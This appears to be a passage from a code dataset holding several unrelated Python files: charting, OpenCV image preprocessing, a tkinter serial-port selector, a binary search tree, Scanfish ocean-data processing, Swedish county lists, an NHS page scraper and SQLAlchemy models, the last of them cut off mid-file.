ax1.xaxis.set_minor_formatter(mdates.DateFormatter('%d'))\n # ax1.xaxis.set_minor_locator(AutoMinorLocator())\n\n # mpf.plot(mpfdf, type='candle', figscale=1, style='blueskies')\n plt.show()\n # print (df[-1:][['open', 'high', 'low', 'close']])\n\n# plot (df, start=-150, end=-50, ctype='ohlc', ha=True, signal='signalxTrade_StackEMA')\n# plot (df, start=-200, ctype='ohlc', ha=True, signal='signalxTrade_StackEMA')\n# plot (df, start=-50, ctype='ohlc')\n# plot (df, start=-10, ctype='candle', ha=True, signal='signalxTrade_StackEMA')\n# plot (df, start=-220, end=-150, ctype='candle', ha=True, signal='signalxTrade_StackEMA')\n# plot (df, start=-450, end=-325, ctype='ohlc', ha=True, signal='signalxTrade_StackEMA')\nplot (df, start=-75, ctype='ohlc', ha=True, signal='signalxTrade_StackEMA')\n# plot (df, start=-200, ctype='ohlc', ha=True, signal='signalxTrade_StackEMA')\n# plot (df, start=-450, end=-300, ctype='ohlc', ha=False)\n\nprint (df[-1:][['open', 'high', 'low', 'close']])\n# yf.Ticker(symbol).get\n","sub_path":"algo_engine/TTM_Sq_Chart_HA_working.py","file_name":"TTM_Sq_Chart_HA_working.py","file_ext":"py","file_size_in_byte":27860,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"36394613","text":"import cv2\nimport numpy as np\nimport math\nimport os\n\nshow_Image = False\n\ndata_path = r\"../1124_train_photo\"\ntarget_path = \"%s_preprocessed\" % data_path\n \n\ndef panelAbstract(srcImage):\n # read pic shape\n imgHeight, imgWidth = srcImage.shape[:2]\n imgHeight = int(imgHeight)\n imgWidth = int(imgWidth)\n # 二維轉一維\n imgVec = np.float32(srcImage.reshape((-1, 3)))\n criteria = (cv2.TERM_CRITERIA_EPS + cv2.TERM_CRITERIA_MAX_ITER, 10, 1.0)\n flags = cv2.KMEANS_RANDOM_CENTERS\n ret, label, clusCenter = cv2.kmeans(imgVec, 2, None, criteria, 10, flags)\n clusCenter = np.uint8(clusCenter)\n clusResult = clusCenter[label.flatten()]\n imgres = clusResult.reshape(srcImage.shape)\n # image轉成灰階\n imgres = cv2.cvtColor(imgres, cv2.COLOR_BGR2GRAY)\n\n cv2.imwrite(\"test.jpg\", imgres)\n # image轉成2維,並做Threshold\n _, thresh = cv2.threshold(imgres, 127, 255, cv2.THRESH_BINARY_INV)\n\n threshRotate = cv2.merge([thresh, thresh, thresh])\n # 印出 threshold後的image\n # if cv2.imwrite(r\"./Photo/thresh.jpg\", threshRotate):\n # print(\"Write Images Successfully\")\n # 确定前景外接矩形\n # find contours\n _, contours, hierarchy = cv2.findContours(thresh, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n minvalx = np.max([imgHeight, imgWidth])\n maxvalx = 0\n minvaly = np.max([imgHeight, imgWidth])\n maxvaly = 0\n maxconArea = 0\n maxAreaPos = -1\n for i in range(len(contours)):\n if maxconArea < cv2.contourArea(contours[i]):\n maxconArea = cv2.contourArea(contours[i])\n maxAreaPos = i\n\n print(\"Contours:\", len(contours))\n\n if len(contours) > maxAreaPos:\n objCont = contours[maxAreaPos]\n else:\n print(\"Error: abnormal contours\")\n return None # return error code\n\n # cv2.minAreaRect生成最小外接矩形\n rect = cv2.minAreaRect(objCont)\n for j in range(len(objCont)):\n minvaly = np.min([minvaly, objCont[j][0][0]])\n maxvaly = np.max([maxvaly, objCont[j][0][0]])\n minvalx = np.min([minvalx, objCont[j][0][1]])\n maxvalx = np.max([maxvalx, objCont[j][0][1]])\n if rect[2] <= -45:\n rotAgl = 90 + rect[2]\n else:\n # 咖啡粉會執行else\n rotAgl = rect[2]\n if rotAgl == 0:\n panelImg = srcImage[minvalx:maxvalx, minvaly:maxvaly, :]\n else:\n # 咖啡粉會執行else\n\n _, dstRotBW = cv2.threshold(thresh, 127, 255, 0)\n # 印出最小外接矩形\n\n _, contours, hierarchy = cv2.findContours(dstRotBW, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n maxcntArea = 0\n maxAreaPos = -1\n for i in range(len(contours)):\n if maxcntArea < cv2.contourArea(contours[i]):\n maxcntArea = cv2.contourArea(contours[i])\n maxAreaPos = i\n x, y, w, h = cv2.boundingRect(contours[maxAreaPos])\n # x,y是矩陣左上角的座標,w,h是矩陣的寬與高\n # umsize代表 1pixel*umsize = 真實大小\n umsize = 90000 / w\n # print(umsize)\n w = w / 8 # 寬度分為8等分\n\n # 將沒有外圍輪廓的咖啡粉存入panelImg,固定照片大小,因此h以w代替\n panelImg = srcImage[int(y + 2 * w):int(y + 6 * w), int(x + w):int(x + 7 * w), :]\n # 印出圖片真實大小\n print(\"Image Size:\", 4 * w * umsize, \" um * \", 6 * w * umsize, \" um\")\n return panelImg\n\n\ndef hist_equal_lab(img):\n global show_Image\n\n # Converting image. to LAB Color model\n lab = cv2.cvtColor(img, cv2.COLOR_BGR2LAB)\n\n # Splitting the LAB image to different channels\n l, a, b = cv2.split(lab)\n if show_Image:\n cv2.namedWindow('l_channel', cv2.WINDOW_NORMAL)\n cv2.imshow('l_channel', l)\n cv2.namedWindow(\"a_channel\", cv2.WINDOW_NORMAL)\n cv2.imshow('a_channel', a)\n cv2.namedWindow(\"b_channel\", cv2.WINDOW_NORMAL)\n cv2.imshow('b_channel', b)\n\n # Applying CLAHE to L-channel\n clahe = cv2.createCLAHE(clipLimit=3.0, tileGridSize=(8, 8))\n cl = clahe.apply(l)\n\n return cl\n\n\nif __name__ == \"__main__\":\n\n if not os.path.exists(target_path):\n os.mkdir(target_path)\n\n print(\"Target Path: \", target_path) \n \n error_files = []\n \n\n for root_Outer, dirs_Outer, files_Outer in os.walk(data_path, topdown=False):\n for directory in dirs_Outer:\n target_dir = os.path.join(target_path, directory)\n\n if not os.path.exists(target_dir):\n os.mkdir(target_dir)\n\n print(\"Target Dir: \", target_dir)\n\n for root, dirs, files in os.walk(os.path.join(root_Outer, directory), topdown=False):\n for name in files:\n img_path = os.path.join(root, name)\n srcImage = cv2.imread(img_path)\n\n (h, w) = srcImage.shape[:2]\n\n center = (w/2, h/2)\n\n for i in range(4):\n rotation_matrix = cv2.getRotationMatrix2D(center, i*90, 1.0)\n rstImage = cv2.warpAffine(srcImage, rotation_matrix, (w, h))\n\n rstImage = panelAbstract(rstImage)\n\n if rstImage is None:\n error_files.append(img_path)\n break\n\n print(rstImage.shape)\n\n rstImage = cv2.resize(rstImage, (1600, 1066), interpolation=cv2.INTER_LINEAR)\n print(rstImage.shape)\n\n rstImage = hist_equal_lab(rstImage)\n\n # 印出結果\n filename = '%s_result_%d.%s' % (name.split('.')[0], i, name.split('.')[-1])\n print('new_Filename: ' + filename)\n print(\"Save in path: \", os.path.join(target_dir, filename))\n if cv2.imwrite(os.path.join(target_dir, filename), rstImage):\n print(\"Write Images Successfully\") \n print(\"Error Files:\", error_files)\n","sub_path":"preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":6049,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"641546220","text":"import pandas as pd\r\nimport matplotlib.pyplot as plt\r\nimport sys\r\n\r\nargs = sys.argv\r\nsamplename = args[1]\r\nfilename = args[2]\r\noutPath = args[3]\r\n\r\ndf = pd.read_csv(filename, sep='\\t', header=None)\r\ndf = df.loc[(df[4] < 100)]\r\ndf = df.sort_values(4, ascending=False)\r\n\r\nfig, ax = plt.subplots(figsize=(20,10))\r\nfig.suptitle(f\"Less than 100X coverage regions for {samplename} Myeloid smMIPS assay\", fontsize=20, fontweight='bold')\r\nax.bar(df[3],df[4])\r\nax.set_xticklabels(df[3], rotation=90, horizontalalignment='right',fontsize='12')\r\nax.set_title(f'Number_of_MIPS ={df.shape[0]}')\r\nax.set_ylabel('Coverage')\r\nplt.savefig(f'{outPath}/{samplename}.Low_Coverage.png', bbox_inches='tight')","sub_path":"scripts/coverageplot.py","file_name":"coverageplot.py","file_ext":"py","file_size_in_byte":686,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"272140633","text":"from tkinter import *\nfrom Port_connect import serial_ports\n\nimport sys \n\nsys_mac = False\nsys_win = False\nsys_linux = False\nif sys.platform.startswith('darwin'):\n from tkmacosx import Button\n sys_mac = True\n\nif sys.platform.startswith('win'):\n sys_win = True\n\nif sys.platform.startswith('linux') or sys.platform.startswith('cygwin'):\n sys_linux = True\n\n\nsys_mac = False\nsys_win = False\nsys_linux = False\nif sys.platform.startswith('darwin'):\n from tkmacosx import Button\n sys_mac = True\n\nif sys.platform.startswith('win'):\n sys_win = True\n\nif sys.platform.startswith('linux') or sys.platform.startswith('cygwin'):\n sys_linux = True\n\npuerto = []\nsend_port = None\n\n\ncontent_size_font = 12\n\n\ndef from_rgb(rgb):\n \"\"\"translates an rgb tuple of int to a tkinter friendly color code\n \"\"\"\n return \"#%02x%02x%02x\" % rgb \n\n\n\ndef connect(lst_box_puertos, root):\n global send_port\n try:\n port = lst_box_puertos.curselection()\n port = lst_box_puertos.get(port)\n send_port = port\n root.destroy()\n except:\n pass\n\ndef update(lst_box_puertos):\n lst_box_puertos.delete(0,\"end\")\n puerto = serial_ports()\n for i in puerto :\n print(\"puerto disponibles : \" + i)\n lst_box_puertos.insert(1,i) \n lst_box_puertos.config(font = (\"\",content_size_font))\n lst_box_puertos.pack()\n\ndef cerrar_w(root):\n global send_port\n send_port = \"cerrar\"\n root.destroy()\n \n\n\ndef w_select_port():\n global sys_linux\n global sys_mac\n global sys_win\n\n if sys_mac:\n #variables de estilo\n title_size_font = 16\n content_size_font = 12\n color_theme = \"snow\"\n color_button = \"deepskyblue3\"\n color_text_button = \"gray99\"\n font = \"Garuda\"\n if sys_linux or sys_win:\n #variables de stylo\n title_size_font = 16\n content_size_font = 12\n color_theme = \"snow\"\n color_button = \"deepskyblue3\"\n color_text_button = \"gray99\"\n font = \"Garuda\"\n color_font_activate_button = \"gray25\"\n color_bg_activate_button = \"deep sky Blue\"\n\n \n root = Tk()\n root.title(\"Colibri 3D\")\n if sys_mac or sys_win:\n root.iconbitmap(\"icon.ico\")\n root.minsize(400, 150 )\n root.config(bg = color_theme)\n root.protocol(\"WM_DELETE_WINDOW\", lambda : cerrar_w(root)) #accion al cerrar la ventana \n \n\n\n #Preparacion de los puertos \n puerto = serial_ports()\n #print(\"Puerto :\" + str(puerto))\n\n #preparacion de la listbox para seleccionar los puertos \n Label(text = \"Selecciona el puerto donde esta conectada la impresora\", bg = color_theme, \n font = (font, content_size_font)).pack(pady = 15, padx = 15)\n \n lst_box_puertos = Listbox(root)\n for i in puerto :\n print(\"puerto disponibles : \" + i)\n lst_box_puertos.insert(1,i) \n lst_box_puertos.config(font = (\"\",content_size_font))\n lst_box_puertos.pack()\n\n #interfaz grafica\n btn_connect = Button(text =\"Conectar\", command = lambda : connect(lst_box_puertos, root), )\n btn_connect.config(bg = color_button, fg = color_text_button ,font =(font,content_size_font))\n if sys_win or sys_linux:\n btn_connect.config( activebackground = color_bg_activate_button, activeforeground =color_font_activate_button, font = (font,content_size_font))\n btn_connect.pack(padx = 15, pady = 10)\n\n btn_update = Button(text =\"Actualizar\", command = lambda : update(lst_box_puertos) )\n btn_update.config(bg = color_button, fg = color_text_button ,font =(font,content_size_font))\n if sys_linux or sys_win:\n btn_update.config( activebackground = color_bg_activate_button, activeforeground =color_font_activate_button, font = (font,content_size_font))\n btn_update.pack(padx = 15, pady = 10)\n\n\n root.mainloop()\n\n\ndef run_select_port():\n w_select_port()\n return send_port\n\nif __name__ == \"__main__\":\n run_select_port()","sub_path":"Select_port.py","file_name":"Select_port.py","file_ext":"py","file_size_in_byte":3974,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"531405967","text":"# Time Complexity : O(2^n * n)\n# Space Complexity : O(1)\n# Did this code successfully run on Leetcode : Yes\n# Any problem you faced while coding this : No\n\n# Problem Approach\n# 1. Suppose len of nums is 3 ([1,2,3])\n# 2. The binary represenation with max len 3 range from(000 to 111)\n# Dec Bin Subset\n# 0 000 []\n# 1 001 [3]\n# 2 010 [2] \n# 3 011 [2,3]\n# 4 100 [1]\n# 5 101 [1,3]\n# 6 110 [1,2]\n# 7 111 [1,2.3]\nclass Solution:\n def subsets(self, nums: List[int]) -> List[List[int]]:\n nums_len = len(nums)\n n = 2 ** nums_len\n res = []\n for i in range(n):\n bin_i = format(i, '#0'+str(nums_len+2)+'b').replace(\"0b\",\"\") # get the binary equivalent in the form of list\n curr = []\n for index, val in enumerate(bin_i):\n if \"1\" == val:\n curr.append(nums[index]) # traverse the binary equivalent and add to curr list if there is 1 at bin index\n res.append(curr)\n return res","sub_path":"78_Subsets_Binary_Num_Mapping.py","file_name":"78_Subsets_Binary_Num_Mapping.py","file_ext":"py","file_size_in_byte":1070,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"95331298","text":"vowels = {'a','e','i','o','u','A','E','I','O','U'}\n\ndef getSimuno(subj):\n if subj == \"I\": return \"ko\"\n elif subj == \"You\": return \"mo\"\n elif subj == \"He\": return \"niya\"\n elif subj == \"She\": return \"niya\"\n elif subj == \"We\": return \"natin\"\n elif subj == \"They\":return \"nila\"\n\ndef getFirstVowel(word):\n firstVowel = -1\n for i in range(len(word)):\n if word[i] in vowels:\n firstVowel = i\n break\n return firstVowel\n\ndef getLastVowel(word):\n lastVowel = -1\n for i in range(len(word)):\n if word[i] in vowels:\n lastVowel = i\n return lastVowel\n\ndef repeatFirstSyllable(word):\n firstVowel = getFirstVowel(word)\n return word[:firstVowel+1] + word\n\ndef lastVowelChange(word):\n lastVowel = getLastVowel(word)\n if word[lastVowel] == 'O':\n word = word[:lastVowel] + 'U' + word[lastVowel+1:]\n elif word[lastVowel] == 'o':\n word = word[:lastVowel] + 'u' + word[lastVowel+1:]\n return word\n\ndef addInToEnd(word):\n if word[-1] in vowels:\n return word + 'hin'\n else:\n return word + 'in'\n\ndef addInToFirstVowel(word):\n firstVowel = getFirstVowel(word)\n return word[:firstVowel] + 'in' + word[firstVowel:]\n\ndef getPandiwa(make, verb):\n pandiwa=verb\n\n if (make == \"will\"):\n pandiwa = repeatFirstSyllable(pandiwa)\n pandiwa = lastVowelChange(pandiwa)\n pandiwa = addInToEnd(pandiwa)\n\n elif (make == \"made\"):\n pandiwa = addInToFirstVowel(pandiwa)\n\n elif (make == \"make\" or make == \"makes\"):\n pandiwa = repeatFirstSyllable(pandiwa)\n pandiwa = addInToFirstVowel(pandiwa)\n\n return pandiwa\n\ndef capitalize(word):\n return word[0].capitalize() + word[1:]\n\nwhile(True):\n try: line=input().split()\n except: break\n subj = line[0]\n make = line[1]\n verb = line[2]\n noun = line[4]\n if (make == 'will'):\n verb = line[3]\n noun = line[5]\n \n pandiwa = getPandiwa(make, verb)\n pandiwa = capitalize(pandiwa)\n simuno = getSimuno(subj)\n\n print(pandiwa, simuno, \"ang\", noun)\n\n","sub_path":"HR/Algolympics2015/B.py","file_name":"B.py","file_ext":"py","file_size_in_byte":2084,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"362329268","text":"from .node import *\n\nclass BinaryTree(Node):\n def __init__(self, val): \n super().__init__(val, max_child_count=2)\n \n def replace_child(self, cindex, child):\n #overriding Node's replace_child method to ensure every nodes has at most one parent.\n assert 0 <= cindex < len(self._children), 'Invalid child index'\n assert isinstance(child, type(self)), f'New child must be a subclasses of {type(self)}'\n if self._children[cindex] is not None:\n # remove current child\n self.remove_child(cindex)\n self._children[cindex] = child\n # this is the main difference between BinaryTreeNode and Node.\n child._parents = [self]\n \n def access(self, idxlst:list):\n nd = self\n try: \n for i in idxlst:\n nd = nd[i]\n except TypeError: \n nd = -1\n return nd\n \n def __repr__(self):\n rep = {} \n def subtree_repr(node, rep, level):\n if level not in rep.keys():\n rep[level] = list()\n if node is None: \n rep[level].append(None)\n return\n \n rep[level].append(Node.__repr__(node)) \n for c in node._children: \n subtree_repr(c, rep, level+1)\n subtree_repr(self, rep, 0)\n if rep[max(rep)].count(None) == len(rep[max(rep)]):\n rep.pop(max(rep))\n return f'{self.__class__.__name__}: ' + repr(rep)\n \n def __str__(self): \n def subtree_str(node): \n if node is None: \n return '_'\n \n val_str = '(' + str(node.value) + '; ' \n for c in node._children:\n val_str += subtree_str(c) + ', '\n val_str = val_str[:-2] + ')'\n return val_str\n return f'{self.__class__.__name__}: ' + subtree_str(self)\n\n\nclass BinarySearchTree:\n def __init__(self, dtype):\n self._dtype = dtype\n self._root = None\n \n def insert(self, val):\n if self._root is None: \n self._root = BinaryTree(val)\n return self\n assert isinstance(val, self._root._dtype), 'Invalid data type'\n p = self._root\n while True:\n if val <= p.value and p[0] is None:\n p[0] = BinaryTree(val)\n break\n if val > p.value and p[1] is None:\n p[1] = BinaryTree(val)\n break \n p = p[0] if val <= p.value else p[1]\n return self\n \n def search(self, val):\n if self._root.value == val:\n return ['root']\n ndidx = []\n p = self._root\n while p is not None:\n if p.value == val:\n return ndidx\n if val < p.value:\n ndidx.append(0)\n p = p[0]\n else:\n ndidx.append(1)\n p = p[1] \n return -1\n \n def access(self, idxlst:list):\n if idxlst == ['root']:\n return self._root\n return self._root.access(idxlst)\n \n def remove(self, val):\n idx = self.search(val)\n if idx == -1:\n return -1\n nd = self.access(idx)\n \n if nd != self._root:\n par_nd = nd._parents[0]\n else:\n # create a dummy Node and then remove it at the end of the function\n par_nd = BinaryTree(val)\n par_nd[0] = nd\n ndidx = 0 if par_nd[0] == nd else 1\n \n if nd.child_count() == 0:\n par_nd.remove_child(ndidx)\n if nd == self._root: \n self._root = None\n return self\n \n subidx = 1 if nd[1] is not None else 0\n lookupidx = 0 if nd[1] is not None else 1\n par_nd.replace_child(ndidx, nd[subidx]) \n if nd[lookupidx] is not None:\n sub = nd[subidx]\n while sub[lookupidx] is not None:\n sub = sub[lookupidx]\n sub[lookupidx] = nd[lookupidx]\n if nd == self._root:\n self._root = nd[subidx]\n return self\n \n def __repr__(self):\n return repr(self._root)\n \n def __str__(self):\n return str(self._root)\n\n\nif __name__ == '__main__': \n BST = BinarySearchTree\n BT = BinaryTree\n root = BT('ROOT')\n root[0] = BT('l')\n root[1] = BT('r')\n root[0][0] = BT('ll')\n root[0][1] = BT('lr')\n root[1][1] = BT('rr')\n root[1][1][1] = BT('rrr')\n\n print(root)\n print(repr(root))\n print('*'*60)\n\n print(root[1][1])\n print(repr(root[1][1][1]))\n print('*'*60)\n\n print(root[1][1][1] == root.access([1,1,1]))\n print('*'*60)\n\n bst = BST(int)\n print(bst.insert(100).insert(10).insert(20).insert(15).insert(17).insert(16).insert(1).insert(5))\n print(bst.search(11))\n print(bst.search(100))\n print(bst.search(10))\n print(bst.search(15))\n print(bst.access(bst.search(15)))\n print('*' * 60)\n\n print(bst)\n print(bst.remove(10))","sub_path":"datastructure/tree.py","file_name":"tree.py","file_ext":"py","file_size_in_byte":5235,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"349802646","text":"# JeromeJGuay January 2020\n\n# Main file to execute Scanfish script.\n\nimport numpy as np\nimport xarray as xr\n\nimport os\nimport sys\nsys.path.append(\"../\")\n\nimport Sillex2018_MetaData as Sx\n\nfrom Processing.Convert.Open_CTD_CNV import cnv_to_netcdf\n\nfrom Processing.Handling.Scanfish_Processing import (remove_Tide,\n ajusted_position,\n filter_cast,\n add_cable_length)\n \nfrom Processing.Gridding.Scanfish_Gridding import transects_gridding\n\nfrom Processing.FindTransect.FindTransect import add_transect_and_position\n\nraw_path = '/home/jeromejguay/WorkSpace/Data/Sillex2018/Raw/Scanfish/SBE49/Data/'\nraw_files = [raw_path+'SBE49_Scanfish_004.cnv',\n raw_path+'SBE49_Scanfish_005.cnv',\n raw_path+'SBE49_Scanfish_006.cnv',\n raw_path+'SBE49_Scanfish_007.cnv',\n raw_path+'SBE49_Scanfish_008.cnv']\n\nSill = \"SillB\"\nleg = Sx.legs['Transect' + Sill]\ntransect = Sx.transects[Sill]\n\nattrs = {\"SillB\": {\"Mission\": \"Sillex2018\"},\n \"SillC\": {\"Mission\": \"Sillex2018\"}}\n\n# \"\"\"---Raw File---\"\"\"\nraw_ds = cnv_to_netcdf(raw_files)\nraw_ds = raw_ds.sel(time=slice(leg[0], leg[1]))\nraw_ds = raw_ds.assign_attrs(attrs[Sill])\n\n\n# \"\"\"---Add calbe Lenght---\"\"\"\ncablelength = 500 # meters\nraw_ds = add_cable_length(raw_ds, cablelength)\n\nraw_save_path = \"/home/jeromejguay/WorkSpace/Data/Sillex2018/Processed/Scanfish/\" + Sill + \"_raw.nc\"\nos.system(\"rm \"+raw_save_path)\nraw_ds.to_netcdf(raw_save_path)\n\n\n# \"\"\"---Remove Tide---\"\"\"\nTideHeight = xr.open_dataset(\"/home/jeromejguay/WorkSpace/Data/Sillex2018/Raw/Tide/Tide.nc\")\ncorrected_ds = remove_Tide(raw_ds, TideHeight)\n\ncorrected_save_path = \"/home/jeromejguay/WorkSpace/Data/Sillex2018/Processed/Scanfish/\" + Sill + \"_corrected.nc\"\nos.system(\"rm \"+corrected_save_path)\ncorrected_ds.to_netcdf(corrected_save_path)\n\n\n# \"\"\"---Get Transect---\"\"\"\nP0 = [transect[0], transect[3]] # [lon0, lat0]\nP1 = [transect[1], transect[2]] # [lon1, lat1]\ntransect_ds = add_transect_and_position(corrected_ds, P0, P1)\ntransect_ds = ajusted_position(transect_ds)\n\n\n# \"\"\"---Get Cast---\"\"\"\ncast = 'up'\ncast_ds = filter_cast(transect_ds, cast=cast, ordered_density=True)\n\ncast_save_path = \"/home/jeromejguay/WorkSpace/Data/Sillex2018/Processed/Scanfish/\" + Sill + \"_\" + 'cast.nc'\nos.system(\"rm \"+cast_save_path)\ncast_ds.to_netcdf(cast_save_path)\n\n\n# \"\"\"---Grid_Cast---\"\"\"\np_res = 50\nd_res = 0.2\n\ngridded_ds = transects_gridding(cast_ds, p_res, d_res,\n min_depth=0, max_depth=180,\n savefile=None)\n\ngridded_save_path = \"/home/jeromejguay/WorkSpace/Data/Sillex2018/Processed/Scanfish/\" + Sill + \"_\" + 'gridded.nc'\ngridded_ds.to_netcdf(gridded_save_path)\n","sub_path":"Executable/Scanfish.py","file_name":"Scanfish.py","file_ext":"py","file_size_in_byte":2825,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"561794460","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.utils.translation import ugettext_lazy as _\n\n#: An alphabetical list of Swedish counties, sorted by codes.\n#: http://en.wikipedia.org/wiki/Counties_of_Sweden\nCOUNTY_CHOICES = (\n ('AB', _('Stockholm')),\n ('AC', _('Västerbotten')),\n ('BD', _('Norrbotten')),\n ('C', _('Uppsala')),\n ('D', _('Södermanland')),\n ('E', _('Östergötland')),\n ('F', _('Jönköping')),\n ('G', _('Kronoberg')),\n ('H', _('Kalmar')),\n ('I', _('Gotland')),\n ('K', _('Blekinge')),\n ('M', _('Skåne')),\n ('N', _('Halland')),\n ('O', _('Västra Götaland')),\n ('S', _('Värmland')),\n ('T', _('Örebro')),\n ('U', _('Västmanland')),\n ('W', _('Dalarna')),\n ('X', _('Gävleborg')),\n ('Y', _('Västernorrland')),\n ('Z', _('Jämtland')),\n)\n\n#: A dictionary of numerical county codes, with alphabetical codes\n#: as keys and the more modern numerical codes as values.\n#:\n#: Values taken from https://sv.wikipedia.org/wiki/Sveriges_län,\n#: and code system described at https://sv.wikipedia.org/wiki/Länskod\n#: and http://www.scb.se/sv_/Hitta-statistik/Regional-statistik-och-kartor/Regionala-indelningar/Lan-och-kommuner/Lan-och-kommuner-i-kodnummerordning/\n\nNUMERICAL_COUNTY_CODE_CHOICES = (\n ('AB', '01',),\n ('AC', '24',),\n ('BD', '25',),\n ('C', '03',),\n ('D', '04',),\n ('E', '05',),\n ('F', '06',),\n ('G', '07',),\n ('H', '08',),\n ('I', '09',),\n ('K', '10',),\n ('M', '12',),\n ('N', '13',),\n ('O', '14',),\n ('S', '17',),\n ('T', '18',),\n ('U', '19',),\n ('W', '20',),\n ('X', '21',),\n ('Y', '22',),\n ('Z', '23',),\n)\n\n#: A dictionary of full county names, as these are not as\n#: somewhat in Swedish, e.g. \"Skåne län\" as opposed to\n#: the more generic \"Stockholms län\" (ending with genitive case s)\n\nFULL_COUNTY_NAME_CHOICES = (\n ('AB', _('Stockholm County'),),\n ('AC', _('Västerbotten County'),),\n ('BD', _('Norrbotten County'),),\n ('C', _('Uppsala County'),),\n ('D', _('Södermanland County'),),\n ('E', _('Östergötland County'),),\n ('F', _('Jönköping County'),),\n ('G', _('Kronoberg County'),),\n ('H', _('Kalmar County'),),\n ('I', _('Gotland County'),),\n ('K', _('Blekinge County'),),\n ('M', _('Skåne County'),),\n ('N', _('Halland County'),),\n ('O', _('Västra Götaland County'),),\n ('S', _('Värmland County'),),\n ('T', _('Örebro County'),),\n ('U', _('Västmanland County'),),\n ('W', _('Dalarna County'),),\n ('X', _('Gävleborg County'),),\n ('Y', _('Västernorrland County'),),\n ('Z', _('Jämtland County'),),\n)\n","sub_path":"localflavor/se/se_counties.py","file_name":"se_counties.py","file_ext":"py","file_size_in_byte":2649,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"412786276","text":"import string\n\nimport requests\nfrom lxml import etree\nimport json\n\n\ndef get_one_page(url):\n kv = {'user_agent':'Mozilla/5.0'}\n response = requests.get(url, headers=kv)\n if response.status_code == 200:\n return response.text\n return None\n\n\ndef main():\n for a in string.ascii_uppercase:\n url = 'https://www.nhs.uk/service-search/GP/Location/Places/' + a + '/4'\n html = get_one_page(url)\n html1 = etree.HTML(html)\n result = html1.xpath('//*[@id=\"main-content\"]/div/div[2]/div[1]/ul/li/a/@href')\n result1 = html1.xpath('//*[@id=\"main-content\"]/div/div[2]/div[1]/ul/li/a')\n fr = open('url.json')\n model = json.load(fr)\n fr.close()\n for i in range(len(result1)):\n model[result1[i].text] = result[i]\n\n jsObj = json.dumps(model, indent=2)\n\n with open('url.json', 'w') as file:\n file.write(jsObj)\n file.close()\n\n\nmain()\nprint(\"yes\")\n","sub_path":"code/webcrawler.py","file_name":"webcrawler.py","file_ext":"py","file_size_in_byte":955,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"636031920","text":"import datetime\nfrom db.mysql import BaseModel, engine\nfrom sqlalchemy import Column, Integer, String, DateTime\n\n\nclass HotWords(BaseModel):\n \"\"\"\n 热点词汇表\n \"\"\"\n\n __tablename__ = 'hot_words'\n\n id = Column(Integer, primary_key=True, autoincrement=True)\n word = Column(String(100), nullable=False)\n num = Column(Integer, default=0)\n update_dt = Column(DateTime, default=datetime.datetime.now())\n\n def __init__(self, word):\n self.word = word\n\n def to_json(self, keys=[]):\n json_data = {}\n\n if len(keys) != 0:\n for key in keys:\n json_data[key] = getattr(self, key)\n return json_data\n else:\n return {\n 'word': self.word,\n 'num': self.num,\n 'updated_dt': str(self.update_dt)\n }\n\n\n\nclass NewsWords(BaseModel):\n \"\"\"\n 分词存储表\n \"\"\"\n\n __tablename__ = 'news_words'\n\n id = Column(Integer, primary_key=True, autoincrement=True)\n name = Column(String(100), nullable=False)\n update_dt = Column(DateTime, default=datetime.datetime.now())\n\n def __init__(self, name):\n self.name = name\n\n def to_json(self, keys=[]):\n json_data = {}\n\n if len(keys) != 0:\n for key in keys:\n json_data[key] = getattr(self, key)\n return json_data\n else:\n return {\n 'name': self.name,\n 'updated_dt': str(self.updated_dt)\n }\n\n\nclass ReqUrlNameMapping(BaseModel):\n __tablename__ = 'req_url_name_mapping'\n\n id = Column(Integer, primary_key=True, autoincrement=True)\n name = Column(String(50), nullable=True, index=True)\n url = Column(String(200), nullable=True)\n pdt_type = Column(String(5))\n color = Column(String(20), default='#108ee9')\n updated_dt = Column(DateTime, default=datetime.datetime.now())\n created_dt = Column(DateTime, default=datetime.datetime.now())\n\n def __init__(self, name, url, pdt_type, color):\n self.name = name\n self.url = url\n self.pdt_type = pdt_type\n self.color = color\n\n def to_json(self, keys=[]):\n json_data = {}\n\n if len(keys) != 0:\n for key in keys:\n json_data[key] = getattr(self, key)\n return json_data\n else:\n return {\n 'name': self.name,\n 'url': self.url,\n 'pdt_type': self.pdt_type,\n 'color': self.color,\n 'updated_dt': str(self.updated_dt),\n 'created_dt': str(self.created_dt)\n }\n\n\nclass ParseLog(BaseModel):\n __tablename__ = 'parse_log'\n\n id = Column(Integer, primary_key=True, autoincrement=True)\n name = Column(String(50), nullable=True, index=True)\n author = Column(String(20), default='', index=True)\n pdt_type = Column(String(5))\n info_num = Column(Integer, default=0, index=True)\n req_url = Column(String(200), nullable=True, index=True)\n url = Column(String(500), default='')\n orig_createtime = Column(String(40), default='', nullable=True)\n updated_dt = Column(DateTime, default=datetime.datetime.now())\n created_dt = Column(DateTime, default=datetime.datetime.now())\n\n def __init__(self, name, req_url, author='', pdt_type='', info_num=0, url='', orig_createtime='', updated_dt=None, created_dt=None):\n self.name = name\n self.author = author\n self.pdt_type = pdt_type\n self.info_num = info_num\n self.req_url = req_url\n self.url = url\n self.orig_createtime = orig_createtime\n self.updated_dt = updated_dt\n self.created_dt = created_dt\n\n def to_json(self, keys=[]):\n json_data = {}\n\n if len(keys) != 0:\n for key in keys:\n json_data[key] = getattr(self, key)\n return json_data\n else:\n return {\n 'id': self.id,\n 'name': self.name,\n 'author': self.author,\n 'pdt_type': self.pdt_type,\n 'info_num': self.info_num,\n 